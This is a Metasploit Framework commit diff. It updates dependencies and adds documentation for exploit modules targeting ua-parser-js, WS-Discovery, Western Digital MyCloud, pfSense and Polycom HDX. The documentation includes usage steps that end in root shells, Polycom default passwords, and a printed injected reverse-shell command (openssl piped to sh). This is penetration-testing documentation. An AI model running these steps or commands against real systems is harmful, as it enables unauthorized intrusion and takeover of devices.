sempervictus
diff --git a/‎Gemfile.lock
Lines changed: 5 additions & 5 deletions b/‎Gemfile.lock
Lines changed: 5 additions & 5 deletions
diff --git a/‎README.md
Lines changed: 1 addition & 1 deletion b/‎README.md
Lines changed: 1 addition & 1 deletion
diff --git a/‎data/exploits/pfsense_clickjacking/background.jpg
1.41 MB b/‎data/exploits/pfsense_clickjacking/background.jpg
1.41 MB
diff --git a/‎data/exploits/pfsense_clickjacking/cookieconsent.min.css
Lines changed: 6 additions & 0 deletions b/‎data/exploits/pfsense_clickjacking/cookieconsent.min.css
Lines changed: 6 additions & 0 deletions
diff --git a/‎data/exploits/pfsense_clickjacking/cookieconsent.min.js
Lines changed: 1 addition & 0 deletions b/‎data/exploits/pfsense_clickjacking/cookieconsent.min.js
Lines changed: 1 addition & 0 deletions
diff --git a/‎documentation/modules/auxiliary/dos/http/ua_parser_js_redos.md
Lines changed: 67 additions & 0 deletions b/‎documentation/modules/auxiliary/dos/http/ua_parser_js_redos.md
Lines changed: 67 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/scanner/wsdd/wsdd_query.md
Lines changed: 34 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/wsdd/wsdd_query.md
Lines changed: 34 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/linux/http/wd_mycloud_multiupload_upload.md
Lines changed: 40 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/wd_mycloud_multiupload_upload.md
Lines changed: 40 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/unix/http/pfsense_clickjacking.md
Lines changed: 23 additions & 0 deletions b/‎documentation/modules/exploit/unix/http/pfsense_clickjacking.md
Lines changed: 23 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md
Lines changed: 131 additions & 0 deletions b/‎documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md
Lines changed: 131 additions & 0 deletions
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.21)
+    metasploit-framework (4.16.23)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -17,7 +17,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.18)
+      metasploit-payloads (= 1.3.19)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.2.8)
       msgpack
@@ -138,7 +138,7 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.7.2)
+    grpc (1.7.3)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
@@ -178,7 +178,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.18)
+    metasploit-payloads (1.3.19)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -193,7 +193,7 @@ GEM
     method_source (0.9.0)
     mini_portile2 (2.3.0)
     minitest (5.10.3)
-    msgpack (1.1.0)
+    msgpack (1.2.0)
     multi_json (1.12.2)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
 
@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.
 
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This auxiliary module exploits a Regular Expression Denial of Service vulnerability
+in the npm module `ua-parser-js`.  Versions before 0.7.16 are vulnerable.  
+Any application that uses a vulnerable version of this module and calls the `getOS`
+or `getResult` functions will be vulnerable to this module.  An example server is provided
+below.
+
+## How to Install
+
+To install a vulnerable version of `ua-parser-js`, run:
+```
+npm i [email protected]
+```
+
+## Verification Steps
+
+Example steps in this format (is also in the PR):
+
+1. Create a new directory for test application.
+2. Copy below example server into test application directory as `server.js`.
+3. Run `npm i express` to install express in the test application directory.
+4. To test vulnerable versions of the module, run `npm i [email protected]` to install a vulnerable version of ua-parser-js.
+5. To test non-vulnerable versions of the module, run `npm i ua-parser-js` to install the latest version of ua-parser-js.
+6. Once all dependencies are installed, run the server with `node server.js`.
+7. Open up a new terminal.
+8. Start msfconsole.
+9. `use auxiliary/dos/http/ua_parser_js_redos`.
+10. `set RHOST [IP]`.
+11. `run`.
+12. In vulnerable installations, Module should have positive output and the test application should accept no further requests.
+13. In non-vulnerable installations, module should have negative output and the test application should accept further requests.
+
+## Scenarios
+
+### ua-parser-js npm module version 0.7.15
+
+Expected output for successful exploitation:
+
+```
+[*] Testing Service to make sure it is working.
+[*] Test request successful, attempting to send payload
+[*] Sending ReDoS request to 192.168.3.24:3000.
+[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
+[*] Testing for service unresponsiveness.
+[+] Service not responding.
+[*] Auxiliary module execution completed
+```
+
+### Example Vulnerable Application
+
+```
+// npm i express
+// npm i [email protected] (vulnerable)
+// npm i ua-parser-js (non-vulnerable)
+
+const express = require('express')
+const uaParser = require('ua-parser-js');
+const app = express()
+
+app.get('/', (req, res) => {
+  var parser = new uaParser(req.headers['user-agent']);
+  res.end(JSON.stringify(parser.getResult()));
+});
+
+app.listen(3000, '0.0.0.0', () => console.log('Example app listening on port 3000!'))
+```
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  [Web Services Dynamic Discovery (WS-Discovery)](https://en.wikipedia.org/wiki/WS-Discovery) is a multicast discovery protocol utilising SOAP over UDP to locate web services on a local network.
+
+  Web service enabled devices typically include printers, scanners and file shares.
+
+  The reply from some devices may include optional vendor extensions. This data may include network information such as the device MAC address and hostname, or hardware information such as the serial number, make, and model.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/scanner/wsdd/wsdd_query`
+  3. Do: `set RHOSTS [IP]` (Default: `239.255.255.250`)
+  4. Do: `run`
+
+
+## Scenarios
+
+  ```
+  msf > use auxiliary/scanner/wsdd/wsdd_query 
+  msf auxiliary(wsdd_query) > set rhosts 239.255.255.250
+  rhosts => 239.255.255.250
+  msf auxiliary(wsdd_query) > run
+
+  [*] Sending WS-Discovery probe to 1 hosts
+  [+] 10.1.1.184 responded with:
+  Address: http://10.1.1.184:3911/ 
+  Types: wsdp:Device, wprt:PrintDeviceType, wscn:ScanDeviceType, hpd:hpDevice
+  Vendor Extensions: {"HardwareAddress"=>"123456789ABC", "UUID"=>"12345678-1234-1234-abcd-123456789abc", "IPv4Address"=>"10.1.1.123", "Hostname"=>"HP09AAFB", "DeviceId"=>"MFG:HP;MDL:Photosmart 5520 series;DES:CX042A;", "DeviceIdentification"=>{"MakeAndModel"=>"Photosmart 5520 series", "MakeAndModelBase"=>"Photosmart 5520 series"}, "SerialNumber"=>"123456", "Services"=>" Print9100 SclScan RESTScan CIFS DOT4 LEDM", "AdapterType"=>"WifiEmbedded"}
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+
@@ -0,0 +1,40 @@
+## Description
+
+This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.
+
+## Vulnerable Application
+	
+  [Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.
+
+  This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .
+
+## Verification Steps
+
+1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
+2. Do: ```set RHOST [IP]```
+3. Do: ```check```
+4. It should be reported as vulnerable
+5. Do: ```run```
+6. You should get a shell
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/wd_mycloud_multiupload_upload
+msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
+RHOST => 192.168.86.104
+msf exploit(wd_mycloud_multiupload_upload) > check
+[+] 192.168.86.104:80 The target is vulnerable.
+msf exploit(wd_mycloud_multiupload_upload) > run
+
+[*] Started reverse TCP handler on 192.168.86.215:4444 
+[*] Uploading PHP payload (1124 bytes) to '/var/www'.
+[+] Uploaded PHP payload successfully.
+[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
+[*] Sending stage (37543 bytes) to 192.168.86.104
+[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
+[+] Deleted .7bc5NqFMK5.php
+
+meterpreter > getuid
+Server username: root (0)
+```
@@ -0,0 +1,23 @@
+## Vulnerable Application
+
+This vulnerability affects any pfSense versions prior to 2.4.2-RELEASE.
+
+## Vulnerable Setup
+
+The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.
+
+## Verification Steps
+
+  1. `use exploit/unix/http/pfsense_clickjacking`
+  2. `set TARGETURI https://<ip WebGUI>`
+  3. `exploit`
+  4. Browse to the URL returned by MSF
+  5. Click anywhere on the returned page
+  6. Note that a new Meterpreter sessions was started.
+
+
+## Options
+
+**TARGETURI**
+
+The base path of the WebGUI. The default base path is https://192.168.1.1/
@@ -0,0 +1,131 @@
+Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator`
+
+
+## Vulnerable Application
+Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup)
+
+## Options
+### PASSWORD
+Although a majority of devices come without a  password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or
+the devices.
+
+
+## Payloads
+Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic`
+
+```
+Compatible Payloads
+===================
+
+   Name                                Disclosure Date  Rank    Description
+   ----                                ---------------  ----    -----------
+   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
+   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
+   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
+   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
+```
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+```
+msf exploit(polycom) > set RHOST 192.168.0.17
+RHOST => 192.168.0.17
+msf exploit(polycom) > set LHOSt ens3
+LHOSt => ens3
+msf exploit(polycom) > set LPORT 3511
+LPORT => 3511
+msf exploit(polycom) > show payloads
+
+Compatible Payloads
+===================
+
+   Name                                Disclosure Date  Rank    Description
+   ----                                ---------------  ----    -----------
+   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
+   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
+   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
+   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
+
+msf exploit(polycom) > set PAYLOAD cmd/unix/reverse
+PAYLOAD => cmd/unix/reverse
+msf exploit(polycom) > set VERBOSE false
+VERBOSE => false
+msf exploit(polycom) > run
+
+[*] Started reverse TCP double handler on 192.168.0.11:3511
+[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
+[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo vGopPRp0jBxt4J2D;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "vGopPRp0jBxt4J2D\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500
+[*] 192.168.0.17:23 - Shutting down payload stager listener...
+
+id
+uid=0(root) gid=0(root)
+whoami
+root
+```
+
+## Debugging
+Setting `VERBOSE` to true should yield an output of.
+
+```
+msf exploit(polycom) > set VERBOSE true
+VERBOSE => true
+rmsf exploit(polycom) > run
+
+[*] Started reverse TCP double handler on 192.168.0.11:3511
+[*] 192.168.0.17:23 - Received : !
+Polycom Command Shell
+XCOM host:    localhost port: 4121
+TTY name:     /dev/pts/6
+Session type: telnet
+2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68]
+2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340
+2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340)
+2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9
+2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104]
+2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380]
+2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6]
+2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342)
+2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10
+2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918
+2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx
+2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered
+
+[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
+[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo WD3QloY3fys6n7dK;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] 192.168.0.17:23 - devcmds
+Entering sticky internal commands *ONLY* mode...
+lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`
+2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`]
+2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68
+2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0
+
+[*] Reading from socket B
+[*] B: "WD3QloY3fys6n7dK\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500
+[*] 192.168.0.17:23 - Shutting down payload stager listener...
+
+id
+uid=0(root) gid=0(root)
+whoami
+root
+```
Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)`
	`1`	`+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)`
`2`	`2`	`==`
`3`	`3`	`The Metasploit Framework is released under a BSD-style license. See`
`4`	`4`	`COPYING for more details.`